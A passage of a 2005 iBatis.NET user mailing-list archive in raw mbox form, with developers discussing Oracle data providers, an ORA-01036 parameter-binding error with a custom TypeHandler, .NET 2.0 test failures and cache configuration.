bmZpZ3VyYXRpb25TY29wZSk8YnI+Jm5ic3A7Jm5ic3A7IGF0IElCYXRpc05ldC5EYXRhQWNjZXNz LkNvbmZpZ3VyYXRpb24uRG9tRGFvTWFuYWdlckJ1aWxkZXIuQnVpbGREYW9NYW5hZ2VycwooWDxi cj5tbERvY3VtZW50IGRvY3VtZW50LCBCb29sZWFuIHVzZUNvbmZpZ0ZpbGVXYXRjaGVyKTxicj4m bmJzcDsmbmJzcDsgLS0tIEVuZCBvZiBpbm5lciBleGNlcHRpb24gc3RhY2sgdHJhY2UgLS0tPGJy PiZuYnNwOyZuYnNwOyBhdCBJQmF0aXNOZXQuRGF0YUFjY2Vzcy5Db25maWd1cmF0aW9uLkRvbURh b01hbmFnZXJCdWlsZGVyLkJ1aWxkRGFvTWFuYWdlcnMoWDxicj5tbERvY3VtZW50IGRvY3VtZW50 LCBCb29sZWFuIHVzZUNvbmZpZ0ZpbGVXYXRjaGVyKQo8YnI+Jm5ic3A7Jm5ic3A7IGF0IElCYXRp c05ldC5EYXRhQWNjZXNzLkNvbmZpZ3VyYXRpb24uRG9tRGFvTWFuYWdlckJ1aWxkZXIuQ29uZmln dXJlKFN0cmluZyByPGJyPmVzb3VyY2UpPGJyPiZuYnNwOyZuYnNwOyBhdCBJQmF0aXNOZXQuRGF0 YUFjY2Vzcy5Db25maWd1cmF0aW9uLkRvbURhb01hbmFnZXJCdWlsZGVyLkNvbmZpZ3VyZSgpPGJy PiZuYnNwOyZuYnNwOyBhdCBPcmFUZXN0LkJhc2VEYW8uR2V0TG9jYWxTcWxNYXAoKSBpbiBFOlx3 b3JrX25ldFxpYmF0aXNOZXRcREFUZXN0XE9yYVRlc3RcQgo8YnI+YXNlREFPLmNzOmxpbmUgMjk8 YnI+Jm5ic3A7Jm5ic3A7IGF0IE9yYVRlc3QuQmFzZURhby5FeGVjdXRlUXVlcnlGb3JMaXN0KFN0 cmluZyBzdGF0ZW1lbnROYW1lLCBPYmplY3QgcGFyYW1ldGVyPGJyPk9iamVjdCkgaW4gRTpcd29y a19uZXRcaWJhdGlzTmV0XERBVGVzdFxPcmFUZXN0XEJhc2VEQU8uY3M6bGluZSA0Njxicj4mbmJz cDsmbmJzcDsgYXQgT3JhVGVzdC5Qcm9kdWN0REFPLkdldFByb2R1Y3RMaXN0KCkgaW4gRTpcd29y a19uZXRcaWJhdGlzTmV0XERBVGVzdFxPcmFUZXMKPGJyPnRcUHJvZHVjdERBTy5jczpsaW5lIDE2 PGJyPiZuYnNwOyZuYnNwOyBhdCBPcmFUZXN0LlByb2dyYW0uTWFpbigpIGluIEU6XHdvcmtfbmV0 XGliYXRpc05ldFxEQVRlc3RcT3JhVGVzdFxQcm9ncmFtLmNzOjxicj5saW5lIDE3PC9kaXY+Cg== ------=_Part_13_27525347.1133836458450-- From [email protected] Tue Dec 06 04:13:06 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61672 invoked from network); 6 Dec 2005 04:13:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Dec 2005 04:13:05 -0000 Received: (qmail 66533 invoked by uid 500); 6 Dec 2005 04:13:05 -0000 Delivered-To: [email protected] Received: (qmail 66411 invoked by uid 500); 6 Dec 2005 04:13:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66378 invoked by uid 99); 6 Dec 2005 04:13:04 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Dec 2005 20:13:04 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Dec 2005 20:13:03 -0800 Received: by zproxy.gmail.com with SMTP id 34so808127nzf for <[email protected]>; Mon, 05 Dec 2005 20:12:43 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=bwVUa2ko5fbcN2vKknoG7kuTV6qmKaGYB3MSJYklAOWjKm2Csf0SZdUEpqlj7AcB05QKIj6JD3V4ioJ/kMnLamMRpg+giabMZqjyOqzhkMd+9A3FmJCDSayFsQMPOYGz+tc/mL6BYFnbELMxnQ+FUy0IXK/T0Hopl8wD3UqgP/M= Received: by 161.129.204.104 with SMTP id x9mr26061qbn; Mon, 05 Dec 2005 20:12:42 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 5 Dec 2005 20:12:42 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 6 Dec 2005 12:12:42 +0800 From: fly abroad <[email protected]> To: [email protected] Subject: Re: Using iBatis.NET DataAccess with NHibernate AND SqlMap In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_893_32615231.1133842362213" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_893_32615231.1133842362213 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Will iBATIS work with Framework 2.0? I'm waiting when all test will be finished now. All test in the _SqlMapTest_ works fine except ResultMapTest: TestExtendedResultMap, TestLazyLoad, TestListMapping says that "Ambiguous match found" TestArrayMapping says that "no parameterless constructor defined for this object" StatementTest: TestExecuteQueryForMap2 fails with "Ambiguous match found" I'll see whats wrong with this tests if have some free time. I have the same problem when i test my demo ibatis dataAccess project. ------=_Part_893_32615231.1133842362213 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline <div>Will iBATIS work with Framework 2.0?</div> <div>&nbsp;</div> <div>I'm waiting when all test will be finished now. <br><br>&nbsp;All test= in the _SqlMapTest_ works fine except <br>&nbsp; ResultMapTest: <br>&nbsp;= &nbsp; TestExtendedResultMap, TestLazyLoad, TestListMapping says that <br>= &quot;Ambiguous match found&quot;=20 <br>&nbsp; &nbsp; TestArrayMapping says that &quot;no parameterless constru= ctor defined <br>for this object&quot; <br>&nbsp; StatementTest: <br>&nbsp;= &nbsp; TestExecuteQueryForMap2 fails with &quot;Ambiguous match found&quot= ; <br>&nbsp;I'll see whats wrong with this tests if have some free time.=20 </div> <div>&nbsp;</div> <div>I have the same problem when i test my demo ibatis dataAccess project.= </div> ------=_Part_893_32615231.1133842362213-- From [email protected] Tue Dec 06 10:40:43 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34654 invoked from network); 6 Dec 2005 10:40:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Dec 2005 10:40:42 -0000 Received: (qmail 73246 invoked by uid 500); 6 Dec 2005 10:40:41 -0000 Delivered-To: [email protected] Received: (qmail 72969 invoked by uid 500); 6 Dec 2005 10:40:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72476 invoked by uid 99); 6 Dec 2005 10:40:31 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Dec 2005 02:40:31 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.sbs-softwaresysteme.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Dec 2005 02:40:04 -0800 Received: (qmail 31048 invoked from network); 6 Dec 2005 11:39:41 +0100 Received: by simscan 1.1.0 ppid: 8973, pid: 22658, t: 2.9746s scanners: clamav: 0.87/m:34/d:1204 spam: 3.0.4 Received: from unknown (HELO sbs-softwaresysteme.de) (161.129.204.104) by mail.sbs-softwaresysteme.de with SMTP; 6 Dec 2005 11:39:38 +0100 Message-ID: <[email protected]> Date: Tue, 06 Dec 2005 11:39:38 +0100 From: Uwe Lesta <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax) X-Accept-Language: de-de, de, en-gb, en-us MIME-Version: 1.0 To: [email protected] Subject: Re: Oracle provider with iBatis dataMapper 1.2 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on mail.sbs-softwaresysteme.de X-Spam-Level: X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, score=-0.4 required=4.9 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.4 X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Roberto, Jeremy Thank's for your remarks. I decide to use the 'oracleClient1.0' ( System.Data.OracleClient ) so i have no problems with numbers and my query's work fine after i wrote a custom TypeHandler for my varchar columns with null values to hanle empty strings. ( working on oracle 10g ) I am a little bit sad about Jeremy's statement 'the Oracle 9i client performed markedly better' and hope that my application don't need this. On the other hand my DAL seems to work well and i can go further coding my business logic. Just testing transaction bracketeds. Thank you verry much for your work on Ibatis. A useful and well documented project. Roberto R wrote: > Tests were run for System.Data.OracleClient, ODP.NET 9i, and ODP.NET 10g. > (I would not recommend using ODP.NET 9i with the DataMapper.) > > From my experience, System.Data.OracleClient was the "easiest" to use right > away, but ODP.NET 10g offers some advanced features that could be used > outside of the DataMapper. Jeremy Gray wrote: > Based on a quick look at the exception, it looks like you've run into the same issue we did, which is that the provider you are using has difficulties mapping the larger Oracle number types into the .net types. > > At the time that we encountered this issue we were only in a position to evaluate the Oracle 9i client and the Microsoft client. Since the Oracle 9i client performed markedly better, we worked around the problem by modifying our query statements to cast such problematic number fields to varchar and allow ibatis.net to map those back into the desired .net numeric types. > > We still have yet to evaluate the 10g client, but I'd like to get to it sometime soon. In the meantime, these workarounds have been rare, so there's not been much need to push towards the 10g client, as much as I might like to dig into it. -- Kind regards Uwe [email protected] From [email protected] Tue Dec 06 17:59:05 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82383 invoked from network); 6 Dec 2005 17:59:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Dec 2005 17:59:05 -0000 Received: (qmail 80913 invoked by uid 500); 6 Dec 2005 17:59:04 -0000 Delivered-To: [email protected] Received: (qmail 80794 invoked by uid 500); 6 Dec 2005 17:59:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 80747 invoked by uid 99); 6 Dec 2005 17:59:03 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Dec 2005 09:59:03 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO cmxrly02.futureshop.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Dec 2005 09:59:02 -0800 Received: from cmxrly02.futureshop.com (localhost [161.129.204.104]) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.9) with ESMTP id jB6Hp1B3007617 for <[email protected]>; Tue, 6 Dec 2005 09:51:01 -0800 (PST) Received: (from root@localhost) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.8/Submit) id jB6Hp1B4007616 for [email protected]; Tue, 6 Dec 2005 09:51:01 -0800 (PST) Received: from CPREXN100.itdmis02.futureshop.com (cprexn100 [161.129.204.104]) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.9) with ESMTP id jB6Hp0B3007601 for <[email protected]>; Tue, 6 Dec 2005 09:51:01 -0800 (PST) Received: from CPREXN020-EVS.itdmis02.futureshop.com ([161.129.204.104]) by CPREXN100.itdmis02.futureshop.com with Microsoft SMTPSVC(6.0.3790.211); Tue, 6 Dec 2005 09:58:31 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Subject: RE: Oracle provider with iBatis dataMapper 1.2 Date: Tue, 6 Dec 2005 09:58:39 -0800 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Oracle provider with iBatis dataMapper 1.2 Thread-Index: AcX6UcVrJH7B+gv1QZ+kosammud4IwAOnfhA From: "Jeremy Gray" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 06 Dec 2005 17:58:31.0978 (UTC) FILETIME=[AB83F8A0:01C5FA8E] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by cmxrly02.futureshop.com id jB6Hp0B3007601 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N -----Original Message----- From: Uwe Lesta [mailto:[email protected]] Sent: Tuesday, December 06, 2005 2:40 AM To: [email protected] Subject: Re: Oracle provider with iBatis dataMapper 1.2 --snip-- I am a little bit sad about Jeremy's statement 'the Oracle 9i client performed markedly better' and hope that my application don't need this ------------------------------------------------------- In our early test, the 9i client won out, but that was early on in the project, before much transaction integration had taken place, while the balance of queries leaned towards the simpler end of the spectrum, etc. What we found at that time was that the Microsoft Oracle client suffered some kind of set-up/tear-down overhead that was increasing our query turn-around times by something in the realm of 35% in some tests and as high as 100% in others. That said, those tests were based on isolated portions of the application that were the first to be ported, so it is impossible to tell which client would win out now, or nearer project completion. This is why I would highly recommend that once your application is coming together with a representative variety of interactions with the database you set aside some time to do some comparative benchmarking of the clients. Each one has pros and cons that have a good chance of affecting your application differently than the applications of others, and differently over time. Jeremy From [email protected] Wed Dec 07 16:12:44 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1839 invoked from network); 7 Dec 2005 16:12:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Dec 2005 16:12:44 -0000 Received: (qmail 88099 invoked by uid 500); 7 Dec 2005 10:46:04 -0000 Delivered-To: [email protected] Received: (qmail 88089 invoked by uid 500); 7 Dec 2005 10:46:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88063 invoked by uid 99); 7 Dec 2005 10:46:03 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Dec 2005 02:46:03 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.sbs-softwaresysteme.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Dec 2005 02:46:01 -0800 Received: (qmail 21873 invoked from network); 7 Dec 2005 11:45:39 +0100 Received: by simscan 1.1.0 ppid: 13543, pid: 8942, t: 1.6694s scanners: clamav: 0.87/m:34/d:1204 spam: 3.0.4 Received: from unknown (HELO sbs-softwaresysteme.de) (161.129.204.104) by mail.sbs-softwaresysteme.de with SMTP; 7 Dec 2005 11:45:37 +0100 Message-ID: <[email protected]> Date: Wed, 07 Dec 2005 11:45:37 +0100 From: Uwe Lesta <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax) X-Accept-Language: de-de, de, en-gb, en-us MIME-Version: 1.0 To: [email protected] Subject: Oracle TypeHandler parameter error ORA-01036 - please help Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on mail.sbs-softwaresysteme.de X-Spam-Level: X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, score=-0.4 required=4.9 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.4 X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hello, I need some help on an Error System.Data.OracleClient.OracleException : ORA-01036 ( Variablename / number unvalid ) ( using C#, IBatis from SVN from 30.11.2005, oracle 10g (provider: oracleClient1.0) ) A breakpoint in SetParameter was reached. in setter setter.DataParameter.ParameterName and SourceColumn is empty. Thanks in advance error : ------------------- MMServer.DAL.USERS_Test.USERS_Update : System.Data.OracleClient.OracleException : ORA-01036: Variablenname/-nummer ungültig at System.Data.OracleClient.OracleConnection.CheckError(OciErrorHandle errorHandle, Int32 rc) at System.Data.OracleClient.OracleParameterBinding.Bind(OciHandle statementHandle, NativeBuffer parameterBuffer, OracleConnection connection) at System.Data.OracleClient.OracleCommand.Execute(OciHandle statementHandle, CommandBehavior behavior, Boolean isReader, Boolean needRowid, OciHandle& rowidDescriptor, ArrayList& refCursorParameterOrdinals) at System.Data.OracleClient.OracleCommand.Execute(OciHandle statementHandle, CommandBehavior behavior, Boolean needRowid, OciHandle& rowidDescriptor) at System.Data.OracleClient.OracleCommand.ExecuteNonQueryInternal(Boolean needRowid, OciHandle& rowidDescriptor) at System.Data.OracleClient.OracleCommand.ExecuteNonQuery() at IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteUpdate(IDalSession session, Object parameterObject) at IBatisNet.DataMapper.SqlMapper.Update(String statementName, Object parameterObject) at MMServer.DAL.USERSDB_gen.Update(USERS USERSObject) in e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\gen\usersdb_gen.cs:line [email protected]_Test.USERS_Update() in e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\gen\db_tests.cs:line 963 ------------------- my query in xml is ------------------- <parameterMaps> <parameterMap id="USERSSelectParameter" class="USERS"> <parameter property="ID" column="ID" /> <parameter property="LOGIN" column="LOGIN" /> <parameter property="FIRSTNAME" column="FIRSTNAME" /> <parameter property="LASTNAME" column="LASTNAME" /> <parameter property="ROLE_ID" column="ROLE_ID" /> <parameter property="ORG_ID" column="ORG_ID" /> <parameter property="REMARK" column="REMARK" typeHandler="OracleStringNull" /> <parameter property="EXPIRES" column="EXPIRES" /> <parameter property="MODIFIED" column="MODIFIED" /> <parameter property="DISABLED" column="DISABLED" /> <parameter property="ACTIVE" column="ACTIVE" /> </parameterMap> </parameterMaps> <update id="Update" parameterMap="USERSSelectParameter" > UPDATE USERS SET LOGIN = #LOGIN#, FIRSTNAME = #FIRSTNAME#, LASTNAME = #LASTNAME#, ROLE_ID = #ROLE_ID#, ORG_ID = #ORG_ID#, REMARK = #REMARK#, EXPIRES = #EXPIRES#, MODIFIED = #MODIFIED#, DISABLED = #DISABLED#, ACTIVE = #ACTIVE# WHERE ID = #ID# </update> ------------------- my ITypeHandlerCallback ------------------- public class OracleVarchar2TypeHandlerCallback : ITypeHandlerCallback { #region ITypeHandlerCallback members public object ValueOf(string sValue) { if (sValue == "\0" || sValue == "") { return System.DBNull.Value; } else{ return sValue; } } public object GetResult(IResultGetter getter) { if (getter.Value == System.DBNull.Value) { return System.DBNull.Value; } else { string s = getter.Value as string; if (s == "\0") return ""; else return getter.Value as string; } } public void SetParameter(IParameterSetter setter, object parameter) { string s = Convert.ToString(parameter); if (s == string.Empty) { setter.Value = "\0"; } else { setter.Value = s; } } #endregion } // class OracleVarchar2TypeHandlerCallback ------------------- -- Kind regards Uwe [email protected] From [email protected] Mon Dec 12 18:50:55 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35899 invoked from network); 12 Dec 2005 18:50:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Dec 2005 18:50:54 -0000 Received: (qmail 60771 invoked by uid 500); 12 Dec 2005 18:50:53 -0000 Delivered-To: [email protected] Received: (qmail 60734 invoked by uid 500); 12 Dec 2005 18:50:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60723 invoked by uid 99); 12 Dec 2005 18:50:52 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Dec 2005 10:50:52 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy includes SPF [email protected]) Received: from [161.129.204.104] (HELO web25604.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 12 Dec 2005 10:50:52 -0800 Received: (qmail 24599 invoked by uid 60001); 12 Dec 2005 18:24:51 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.es; h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=qxdPWJMilf9oRJ2DeKxH1Gmeu3TxhWz3D1Dm+BqZ5H9hUP+2Z8npt+ThRzR+c+6HJPYSV7hLlabfiMIGQsfWroKdWyj/BKmS6Y/Y3zDW56VmpNzxxaqPBNx9JoSsf/t0EmDv1cOL/CyzlHm7DNfvUiHe7lIpMWY2iZqSOUCESbk= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web25604.mail.ukl.yahoo.com via HTTP; Mon, 12 Dec 2005 19:24:51 CET Date: Mon, 12 Dec 2005 19:24:51 +0100 (CET) From: Mariano <[email protected]> Subject: Cache Ibatis .NET To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N hello alls Ive tried use Ibatis cache but it doesnt work. This is my SqlMap <?xml version="1.0" encoding="utf-8" ?> <sqlMap namespace="Configuracion" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="SqlMap.xsd"> <alias> <typeAlias alias="configuracion" type="Acceso.Configuracion, Acceso" /> </alias> <cacheModels> <cacheModel id="cacheConfBiz" implementation="LRU"> <flushInterval minutes="5"/> <flushOnExecute statement="CONFIGURACIONDelete"/> <flushOnExecute statement="CONFIGURACIONUpdate"/> <flushOnExecute statement="CONFIGURACIONInsert"/> <property name="CacheSize" value="10"/> </cacheModel> </cacheModels> <statements> <!-- PROCEDMIENTO SELECT --> <select id="CONFIGURACIONSelect" resultClass="configuracion" cacheModel="cacheConfBiz"> SELECT [Key],VALUE,APLICACION,ID_CONFIGURATION, ENCRIPTACION FROM CONFIGURATION_BIZ where APLICACION=#APLICACIONS# </select> </statements> Show me this msg error Server Application Unavailable The web application you are attempting to access on this web server is currently unavailable.  Please hit the "Refresh" button in your web browser to retry your request. Administrator Note: An error message detailing the cause of this specific request failure can be found in the application event log of the web server. Please review this log entry to discover what caused this error to occur. ______________________________________________ Renovamos el Correo Yahoo! Nuevos servicios, más seguridad http://correo.yahoo.es From [email protected] Mon Dec 12 22:09:18 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48854 invoked from network); 12 Dec 2005 22:09:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Dec 2005 22:09:18 -0000 Received: (qmail 16536 invoked by uid 500); 12 Dec 2005 22:09:18 -0000 Delivered-To: [email protected] Received: (qmail 16522 invoked by uid 500); 12 Dec 2005 22:09:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16511 invoked by uid 99); 12 Dec 2005 22:09:17 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Dec 2005 14:09:17 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web32213.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 12 Dec 2005 14:09:16 -0800 Received: (qmail 48550 invoked by uid 60001); 12 Dec 2005 22:08:55 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=tucjvsyO4mwZCU+9fgkBRE46js5UgxkyEcbrXh8nYtqNIx010hckmRNm6wO7D2diGkRefz4Rey3SPPG04emS5I/78ZV/Skd1b9zTRR8Wmc+JU11s5IP4NizZMORIgy25XYRrRkfuEmUgnxGj/FXBOBVSRravcp1p7BcjNmOpvzM= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web32213.mail.mud.yahoo.com via HTTP; Mon, 12 Dec 2005 14:08:55 PST Date: Mon, 12 Dec 2005 14:08:55 -0800 (PST) From: Ron Grabowski <[email protected]> Subject: Re: Cache Ibatis .NET To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N The cache has been working for quite some time. Are you able to get IBatisNet working normally without the cache? The error message you're seeing looks a general ASP.Net error and not necessarily by IBatisNet. I've seen that error while trying to access a page while the app domain is reloading itself (i.e. you go to a page while the web application is reloading itself). --- Mariano <[email protected]> wrote: > > hello alls > > Ive tried use Ibatis cache but it doesnt work. > > This is my SqlMap > > > <?xml version="1.0" encoding="utf-8" ?> > <sqlMap namespace="Configuracion" > xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" > xsi:noNamespaceSchemaLocation="SqlMap.xsd"> > > <alias> > <typeAlias alias="configuracion" > type="Acceso.Configuracion, Acceso" /> > </alias> > > <cacheModels> > <cacheModel id="cacheConfBiz" implementation="LRU"> > <flushInterval minutes="5"/> > <flushOnExecute statement="CONFIGURACIONDelete"/> > <flushOnExecute statement="CONFIGURACIONUpdate"/> > <flushOnExecute statement="CONFIGURACIONInsert"/> > <property name="CacheSize" value="10"/> > </cacheModel> > > </cacheModels> > > > <statements> > <!-- PROCEDMIENTO SELECT --> > <select id="CONFIGURACIONSelect" > resultClass="configuracion" cacheModel="cacheConfBiz"> > SELECT [Key],VALUE,APLICACION,ID_CONFIGURATION, > ENCRIPTACION FROM CONFIGURATION_BIZ > where APLICACION=#APLICACIONS# > </select> > </statements> > > > Show me this msg error > Server Application Unavailable > The web application you are attempting to access on > this web server is currently unavailable.� Please hit > the "Refresh" button in your web browser to retry your > request. > Administrator Note: An error message detailing the > cause of this specific request failure can be found in > the application event log of the web server. Please > review this log entry to discover what caused this > error to occur. > > > > > ______________________________________________ > Renovamos el Correo Yahoo! > Nuevos servicios, m�s seguridad > http://correo.yahoo.es > From [email protected] Tue Dec 13 16:46:47 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66285 invoked from network); 13 Dec 2005 16:46:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Dec 2005 16:46:37 -0000 Received: (qmail 72509 invoked by uid 500); 13 Dec 2005 12:34:01 -0000 Delivered-To: [email protected] Received: (qmail 72390 invoked by uid 500); 13 Dec 2005 12:33:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71662 invoked by uid 99); 13 Dec 2005 12:33:52 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Dec 2005 04:33:52 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy includes SPF [email protected]) Received: from [161.129.204.104] (HELO 